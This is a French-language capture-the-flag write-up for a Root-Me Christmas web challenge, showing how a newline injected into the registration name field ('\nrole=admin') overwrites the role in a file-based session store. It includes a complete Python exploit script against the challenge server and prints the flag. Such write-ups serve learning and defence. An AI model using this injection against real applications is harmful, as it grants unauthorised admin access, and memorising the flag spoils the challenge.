✅ Day 15 - New new .. always new

calendar Dec 15, 2024 · 2 mins de lecture  ·
Partager sur: linkedin copy
  • WEB
  • Date de résolution : 13/12/2024

Reconnaissance

Ce challenge consiste à devenir admin sur le site web.
Il est possible de s'enregistrer mais dans la fonction register(), le rôle est écrit en dur = 'user' !
On remarque ensuite que la fonction create_session() est un peu particulière car elle enregistre les données de session dans un fichier... Hummm ! 

1with open(session_file, 'w') as f:
2        f.write(f'email={email}\n')
3        f.write(f'role={role}\n')
4        f.write(f'name={name}\n')

Et si je surchargeais mon {name} avec un retour chariot '\n' et role=admin ? PWN !!

Exploit

Mon script avec l'exploit complet :

 1import requests
 2from requests.packages.urllib3.exceptions import InsecureRequestWarning
 3requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 4import json
 5
 6URL_BASE = "https://day15.challenges.xmas.root-me.org/"
 7#URL_BASE = "http://localhost:8000/"
 8EMAIL = "toto@wonderland.fr"
 9NAME="toto"
10PASS = "toto"
11HEADERS = {
12    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0',
13    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8',
14    'Accept-Language': 'en-US,en;q=0.5',
15    'Accept-Encoding': 'gzip, deflate, br',
16    'Content-Type': 'application/json',
17    'Origin': URL_BASE,
18    'Upgrade-Insecure-Requests': '1'
19}
20
21def register(session):
22    print(f"REGISTERING...")
23    json_data = '{"email": "' + EMAIL + '", "name": "' + NAME + '\\nrole=admin", "password": "' + PASS + '"}'
24    print(f"{json_data = }")
25    url = URL_BASE + "register"
26    r = session.post(url, headers=HEADERS, data=json_data, verify=False)
27    return r.text
28
29def login(session):
30    print(f"LOGIN...")
31    data = {"email":EMAIL, "password":PASS}
32    json_data = json.dumps(data)
33    url = URL_BASE + "login"
34    r = session.post(url, headers=HEADERS, data=json_data, verify=False)
35    print(f"{r.cookies.get('session_id') = }")
36    return r.text
37
38def dashboard(session):
39    print(f"DASHBOARDING...")
40    url = URL_BASE + "dashboard"
41    HEADERS['Content-Type'] = 'application/x-www-form-urlencoded'
42    r = session.get(url, headers=HEADERS, cookies=session.cookies, verify=False)
43    return r.text
44
45def admin(session):
46    print(f"GO TO THE FLAG...")
47    url = URL_BASE + "admin"
48    HEADERS['Content-Type'] = 'application/x-www-form-urlencoded'
49    r = session.get(url, headers=HEADERS, cookies=session.cookies, verify=False)
50    return r.text
51
52if __name__ == "__main__":
53    s = requests.Session()
54    s_reg = register(s)
55    print(s_reg)
56    s_log = login(s)
57    s_dash = dashboard(s)
58    print(s_dash)
59    s_flag = admin(s)
60    print(s_flag)
FLAG

The flag is : RM{I_Thought_Th1s_VUlnerab1ility_W4s_N0t_Imp0rtant}